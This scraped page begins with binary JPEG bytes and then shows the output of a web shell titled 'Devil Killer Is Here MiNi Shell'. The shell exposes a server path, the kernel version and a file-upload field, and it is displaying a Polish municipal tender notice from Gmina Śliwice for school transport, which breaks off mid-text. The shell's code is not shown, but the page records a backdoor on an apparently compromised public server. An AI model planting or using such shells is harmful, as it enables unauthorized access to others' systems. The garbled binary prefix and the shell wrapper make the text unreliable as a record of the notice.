JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230818/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230818/0035924001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowożenie uczniów do szkół na terenie Gminy Śliwice<br/>w roku szkolnym 2023/2024 (trasa nr I-IV) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Śliwice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 092351140</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ks. dra St. Sychowskiego 30</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Śliwice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">89-530</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL618 - Świecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">52 3340710</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@sliwice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.sliwice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowożenie uczniów do szkół na terenie Gminy Śliwice<br/>w roku szkolnym 2023/2024 (trasa nr I-IV) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b3e87c6a-3d80-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00359240</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-08-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/sliwice <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/sliwice</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W niniejszym postępowaniu<br/>komunikacja Zamawiającego z Wykonawcami prowadzona jest pisemnie w języku polskim (w rozumieniu art. 20 i art. 7 pkt. 16 PZP)<br/>przy użyciu środka komunikacji elektronicznej -jakim jest- platformazakupowa.pl pod adresem:<br/>https://platformazakupowa.pl/pn/sliwice, w zakładce<br/>„POSTĘPOWANIA” i pod nazwą postępowania wskazaną w tytule SWZ.<br/>2. W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między zamawiającym a Wykonawcami,<br/>w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były za pośrednictwem platformazakupowa.pl<br/>i formularza „Wyślij wiadomość do zamawiającego”. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz<br/>informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość<br/>do zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego. Zamawiający dopuszcza<br/>awaryjnie np. w<br/>przypadku przerwy w funkcjonowaniu lub awarii lub niedziałania Platformy zakupowej, komunikację z wykonawcami za<br/>pośrednictwem poczty elektronicznej. Adres poczty elektronicznej osoby uprawnionej do kontaktu z Wykonawcami:<br/>przetargi@sliwice.pl, z zastrzeżeniem, że ofertę (w szczególności Formularz oferty i załączniki do oferty) wykonawca może złożyć<br/>wyłącznie za pośrednictwem Platformy zakupowej.<br/>3. Zamawiający będzie przekazywał wykonawcom informacje pisemnie (w rozumieniu art. 20 i art. 7 pkt. 16 PZP) przy użyciu środka<br/>komunikacji elektronicznej - jakim jest - platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji,<br/>zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji „Komunikaty”. Korespondencja,<br/>której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana pisemnie (w rozumieniu<br/>art. 20 i art. 7 pkt. 16 PZP) przy użyciu środka komunikacji elektronicznej - jakim jest - platformazakupowa.pl do konkretnego<br/>wykonawcy.<br/>4. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na<br/>platformazakupowa.pl przesłanych przez zamawiającego, gdyż<br/>system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>5. Zamawiający, zgodnie z rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r. poz. 2452) określa<br/>niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a. stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b. komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c. zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>d. włączona obsługa JavaScript,<br/>e. zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f. Szyfrowanie na platformazakupowa.pl obywa się za pomocą protokołu TLS 1.3.<br/>g. Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar.<br/>6. Dalsze informacje w rozdziale VIII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1. administratorem Pani/Pana danych osobowych jest Gmina Śliwice reprezentowana przez Wójta Gminy Śliwice, z siedzibą Urzędu<br/>Gminy ul. ks. dra Sychowskiego 30, 89-530 Śliwice; <br/>2. administrator wyznaczył Inspektora Ochrony Danych, z którym można się skontaktować poprzez adres poczty elektronicznej<br/>iod.gmina@sliwice.pl lub pisemnie na adres Urzędu Gminy;<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego prowadzonym w trybie podstawowym na podstawie art. 275 ust 1 ustawy;<br/>4. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy;<br/>5. Pani/Pana dane osobowe będą przechowywane przez okres niezbędny do realizacji celów określonych w pkt 3, a po tym czasie<br/>przez okres wymagany przez przepisy powszechnie obowiązującego prawa;<br/>6. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>7. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>8. posiada Pani/Pan:<br/>1) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; 2) na podstawie art. 16 RODO prawo<br/>do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie<br/>może naruszać integralności protokołu oraz jego załączników);<br/>3) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków<br/>ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>4) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9. nie przysługuje Pani/Panu:<br/>1) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>3) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZ.271.1.9.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie usług transportowych w zakresie dowożenia uczniów do szkół i przedszkola na terenie Gminy Śliwice w roku szkolnym 2023/2024 (trasa nr I-IV).<br/>2.	Zestawienie tras wraz z ilością kilometrów, liczbą przejazdów i liczą dzieci zawiera Załącznik nr 6 do SWZ Zestawienie tras dowozu uczniów w roku szkolnym 2023/2024.<br/>3.	Przedmiot zamówienia został podzielony na 4 części (trasy). <br/>-	Część I – trasa I - Śliwice-Zwierzyniec-Okoniny-Główka-Lińsk Wybudowania – Śliwice<br/>-	Część II – trasa II - Śliwice-Łąski Piec-Zazdrość-Laski-Śliwiczki-Śliwice oraz Śliwiczki-Laski-Zazdrość-Łąski Piec-Śliwiczki<br/>-	Część III – trasa III - Lińsk-Okoniny Nadjeziorne (ośrodki)-Okoniny Nadjeziorne (sklep)-Brzozowe Błota-Kamionka-Lisiny-Jabłonka-Lińsk<br/>-	Część IV – trasa IV - Śliwice Śliwice – Okoniny Nadjeziorne (ośrodki)-Okoniny Nadj. (sklep) -Śliwice.<br/>4.	Przewozy uczniów odbywać się mogą wyłącznie pojazdami samochodowymi (zwanymi dalej pojazdami) spełniającymi wymagania techniczne określone w przepisach ustawy - Prawo o ruchu drogowym (t.j. Dz.U. 2023 poz. 047) i innych przepisach związanych z przewozem osób, ustawą z dnia 6 września 2001 r. o transporcie drogowym (t.j. Dz.U. 2022r. poz. 2201).<br/>5.	W ramach realizacji zamówienia Wykonawca jest zobowiązany:<br/>-	posiadać wszystkie niezbędne zezwolenia i licencje itp., <br/>-	posiadać ubezpieczenie pojazdów i pasażerów od wszelkich szkód powstałych podczas przewozu i pozostających w związku z przewozem,<br/>-	zapewnić opiekę nad dowożonymi uczniami,<br/>-	dysponować sprawnym technicznie pojazdem służącym do przewozu osób,<br/>-	zapewnić pojazd zastępczy w przypadku awarii i innych przypadków wykluczających dowożenie dzieci dotychczasowym pojazdem,<br/>-	oznaczyć pojazd w taki sposób, aby zawierał informacje, że służy do przewozu uczniów, <br/>-	zapewnić uczniom bezpieczny przewóz tzn. odpowiednie warunki bezpieczeństwa i higieny, <br/>-	dysponować pojazdami o wystarczającą liczbie miejsc siedzących dla określonej trasy zgodnie z załącznikiem nr 6 lub posiadać taką ilość pojazdów, aby dowieźć wszystkich uczniów na danej trasie, <br/>-	dysponować odpowiednią liczbą kierowców do realizacji zadania posiadających wymagane uprawnienia,<br/>-	ponosić wszystkie koszty związane z eksploatacją i używaniem pojazdów oraz realizacją zamówienia. <br/>6.	Szczegółowy plan dowozów oraz ewentualne zmiany Wykonawca jest zobowiązany uzgodnić z właściwym dyrektorem. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60140000-1 - Nieregularny transport osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający wybierze ofertę najkorzystniejszą spośród ofert nie odrzuconych na podstawie<br/>kryteriów oceny ofert określonych w SWZ.<br/>2. Przy wyborze ofert Zamawiający kierować się będzie następującym kryterium:<br/>Opis kryteriów oceny Znaczenie<br/>A. Cena 60%<br/>B. Termin płatności faktury 40%<br/>Maksymalna łączna ilość punktów do uzyskania wynosi 100.<br/>A. Kryterium ceny – maksymalna liczba punktów 60 - zastosowanie będzie miał następujący wzór,<br/>wykorzystywany przy ocenie oferty:<br/>Najniższa cena ofertowa<br/>A = --------------------------------------------- x 100 x 60%<br/>Cena obliczanej oferty<br/>B. Kryterium okres gwarancji jakości - maksymalna liczba punktów 40 - zastosowanie będzie miał<br/>następujący wzór, wykorzystywany przy ocenie oferty:<br/>Termin płatności badanej oferty<br/>B = --------------------------------------------------- x 100 x 40%<br/>Najdłuższy termin płatności<br/>2. W formularzu ofertowym wykonawca wskaże termin płatności faktury nie krótszy niż 7 dni i nie dłuższy niż 30 dni.<br/>1. W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane są punkty za powyższe kryteria. Zastosowanie<br/>będzie miał następujący wzór:<br/>P (punkty) = A+B<br/>2. Za ofertę najkorzystniejszą zostanie uznana ta, która uzyskała największą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie usług transportowych w zakresie dowożenia uczniów do szkół i przedszkola na terenie Gminy Śliwice w roku szkolnym 2023/2024 (trasa nr I-IV).<br/>2.	Zestawienie tras wraz z ilością kilometrów, liczbą przejazdów i liczą dzieci zawiera Załącznik nr 6 do SWZ Zestawienie tras dowozu uczniów w roku szkolnym 2023/2024.<br/>3.	Przedmiot zamówienia został podzielony na 4 części (trasy). <br/>-	Część I – trasa I - Śliwice-Zwierzyniec-Okoniny-Główka-Lińsk Wybudowania – Śliwice<br/>-	Część II – trasa II - Śliwice-Łąski Piec-Zazdrość-Laski-Śliwiczki-Śliwice oraz Śliwiczki-Laski-Zazdrość-Łąski Piec-Śliwiczki<br/>-	Część III – trasa III - Lińsk-Okoniny Nadjeziorne (ośrodki)-Okoniny Nadjeziorne (sklep)-Brzozowe Błota-Kamionka-Lisiny-Jabłonka-Lińsk<br/>-	Część IV – trasa IV - Śliwice Śliwice – Okoniny Nadjeziorne (ośrodki)-Okoniny Nadj. (sklep) -Śliwice.<br/>4.	Przewozy uczniów odbywać się mogą wyłącznie pojazdami samochodowymi (zwanymi dalej pojazdami) spełniającymi wymagania techniczne określone w przepisach ustawy - Prawo o ruchu drogowym (t.j. Dz.U. 2023 poz. 047) i innych przepisach związanych z przewozem osób, ustawą z dnia 6 września 2001 r. o transporcie drogowym (t.j. Dz.U. 2022r. poz. 2201).<br/>5.	W ramach realizacji zamówienia Wykonawca jest zobowiązany:<br/>-	posiadać wszystkie niezbędne zezwolenia i licencje itp., <br/>-	posiadać ubezpieczenie pojazdów i pasażerów od wszelkich szkód powstałych podczas przewozu i pozostających w związku z przewozem,<br/>-	zapewnić opiekę nad dowożonymi uczniami,<br/>-	dysponować sprawnym technicznie pojazdem służącym do przewozu osób,<br/>-	zapewnić pojazd zastępczy w przypadku awarii i innych przypadków wykluczających dowożenie dzieci dotychczasowym pojazdem,<br/>-	oznaczyć pojazd w taki sposób, aby zawierał informacje, że służy do przewozu uczniów, <br/>-	zapewnić uczniom bezpieczny przewóz tzn. odpowiednie warunki bezpieczeństwa i higieny, <br/>-	dysponować pojazdami o wystarczającą liczbie miejsc siedzących dla określonej trasy zgodnie z załącznikiem nr 6 lub posiadać taką ilość pojazdów, aby dowieźć wszystkich uczniów na danej trasie, <br/>-	dysponować odpowiednią liczbą kierowców do realizacji zadania posiadających wymagane uprawnienia,<br/>-	ponosić wszystkie koszty związane z eksploatacją i używaniem pojazdów oraz realizacją zamówienia. <br/>6.	Szczegółowy plan dowozów oraz ewentualne zmiany Wykonawca jest zobowiązany uzgodnić z właściwym dyrektorem. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60140000-1 - Nieregularny transport osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający wybierze ofertę najkorzystniejszą spośród ofert nie odrzuconych na podstawie<br/>kryteriów oceny ofert określonych w SWZ.<br/>2. Przy wyborze ofert Zamawiający kierować się będzie następującym kryterium:<br/>Opis kryteriów oceny Znaczenie<br/>A. Cena 60%<br/>B. Termin płatności faktury 40%<br/>Maksymalna łączna ilość punktów do uzyskania wynosi 100.<br/>A. Kryterium ceny – maksymalna liczba punktów 60 - zastosowanie będzie miał następujący wzór,<br/>wykorzystywany przy ocenie oferty:<br/>Najniższa cena ofertowa<br/>A = --------------------------------------------- x 100 x 60%<br/>Cena obliczanej oferty<br/>B. Kryterium okres gwarancji jakości - maksymalna liczba punktów 40 - zastosowanie będzie miał<br/>następujący wzór, wykorzystywany przy ocenie oferty:<br/>Termin płatności badanej oferty<br/>B = --------------------------------------------------- x 100 x 40%<br/>Najdłuższy termin płatności<br/>2. W formularzu ofertowym wykonawca wskaże termin płatności faktury nie krótszy niż 7 dni i nie dłuższy niż 30 dni.<br/>1. W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane są punkty za powyższe kryteria. 